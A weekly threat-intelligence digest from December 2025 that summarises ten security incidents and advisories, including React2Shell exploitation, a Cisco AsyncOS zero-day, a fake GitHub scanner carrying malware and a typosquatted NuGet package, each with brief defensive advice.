WEEKLY TOP TEN: December 22, 2025, 16:00 GMT
- Microsoft Guidance on Defending Against React2Shell
Microsoft detailed observed exploitation activity for React2Shell affecting React Server Components, noting real-world attempts and post-exploitation payloads (with coin miners showing up prominently). Even if your org isn’t a “web company,” React/Next.js services can exist as internal portals, dev tooling, or vendor apps—often internet-exposed by accident. Security teams should inventory RSC usage, patch quickly, add WAF rules where feasible, and hunt for unusual child processes from web server contexts. Treat any successful pre-auth RCE as credential-compromise-adjacent: rotate secrets, review tokens, and re-issue keys. - China-Linked “Ink Dragon” Expands Espionage
Reporting indicates the China-linked Ink Dragon espionage group expanded activity into European government environments, leveraging compromised servers as part of its operations. For defenders, this is classic “living off the land but with infrastructure”: attackers don’t need novel 0-days if they can squat on already-compromised boxes and blend into normal admin traffic. Prioritize hardening and monitoring on externally reachable services, tighten egress controls, and hunt for unusual tunneling, new scheduled tasks, and anomalous credential use across admin boundaries. Also, validate that your incident response plan assumes a multi-month dwell time. - Cisco AsyncOS Zero-Day Exploitation (AquaShell)
Cisco has issued an urgent advisory regarding an unpatched zero-day vulnerability in its Secure Email Gateway and Web Manager appliances running AsyncOS. Attackers are actively exploiting this flaw to execute arbitrary commands with root privileges, primarily on systems where the “Spam Quarantine” feature is enabled. The campaign, tracked as UAT-9686, involves the deployment of a persistent Python-based backdoor called AquaShell and a tunneling tool named AquaTunnel. This allows threat actors to maintain long-term access and exfiltrate sensitive communication data from enterprise environments. - 700CREDIT Breach Impacts Millions
700Credit (a fintech/data services provider supporting dealerships and credit workflows) reported a breach impacting millions of individuals. Incidents like this are especially ugly because the data tends to be identity-grade (PII that fuels fraud, synthetic identity creation, and targeted social engineering). Businesses that integrate with niche data providers should treat them as “high blast-radius” third parties: tighten vendor access paths, demand evidence of security controls (not vibes), and monitor for credential stuffing and spear-phish waves that follow public disclosure. If your workforce or customers overlap with the affected population, prep your help desk and fraud playbooks now. - HPE OneView Maximum Severity Vulnerability
Hewlett Packard Enterprise (HPE) disclosed a critical vulnerability in its OneView management software, assigned a maximum CVSS score of 10.0. The flaw allows unauthenticated remote code execution (RCE), potentially giving an attacker complete control over the infrastructure management platform. Given that OneView is used to orchestrate large-scale data center resources, a compromise could lead to widespread lateral movement or ransomware deployment across an entire enterprise. Businesses using HPE infrastructure are urged to apply the latest security patches immediately to mitigate this catastrophic risk. - Malicious React2Shell Scanner Targets Researchers
HackRead reported on a deceptive GitHub repository falsely advertised as a vulnerability scanner for the high-profile “React2Shell” flaw (CVE-2025-55182). The repository, created by a user named niha0wa, contained a hidden payload that was leveragedmshta.exeto infect the systems of security researchers and IT professionals investigating the vulnerability. By turning a defensive tool into a malware delivery vehicle, the attackers aimed to compromise the very individuals responsible for securing their organizations. This event emphasizes the danger of using unvetted community tools during active incident response. - CISA Adds Multiple Flaws to KEV Catalog
CISA added several vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, including flaws in Gladinet CentreStack, Triofox, and Apple products. Of particular concern is CVE-2025-14611, a hard-coded cryptographic vulnerability in storage and file-sharing solutions. By including these in the KEV catalog, CISA indicates that threat actors are actively using them in the wild. Federal agencies and private-sector organizations are required or strongly advised to prioritize these remediations, as they are the most likely vectors for successful breaches. - Google Android Security Bulletin: Active Zero-Days
Google’s mid-December security update highlighted two zero-day vulnerabilities in the Android Framework (CVE-2025-48633 and CVE-2025-48572) that are reportedly under limited, targeted exploitation. These vulnerabilities allow for information disclosure and elevation of privilege, enabling an attacker to bypass security boundaries on mobile devices. Because Android devices are frequently used for multi-factor authentication and corporate communication, these flaws represent a significant risk to organizational identity security. Security teams are encouraged to ensure all mobile fleets are updated to the December 2025 patch level. - Typosquatting Attack on NuGet .NET Library
Security researchers discovered a malicious package on the NuGet repository namedTracer.Fody.NLog, which typosquats a popular .NET tracing library. The package uses homoglyph tricks—replacing characters with similar-looking ones—to deceive developers into downloading it. Once integrated into a project, the malware exfiltrates Stratis wallet JSON files and passwords to a Russian-based IP address. This supply-chain attack demonstrates that even well-maintained development ecosystems remain vulnerable to simple naming deceptions that can lead to significant credential and asset theft. - SonicWall Edge Access Zero-Day Attacks
SonicWall SMA1000 series edge access devices were targeted by zero-day attacks (CVE-2025-40602). Threat actors exploited a flaw in the remote access gateway to gain unauthorized entry into corporate networks. As edge devices are the first line of defense, these vulnerabilities are particularly dangerous, often serving as the initial entry point for ransomware groups. CISA has already added this vulnerability to its KEV list, signaling that the exploitation is widespread. Organizations using SonicWall for VPN or remote access must apply the vendor-provided emergency patches.
Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The previous 10 stories were determined to be most significant during the course of the week, ranked by highest risk, and using multiple sources when available.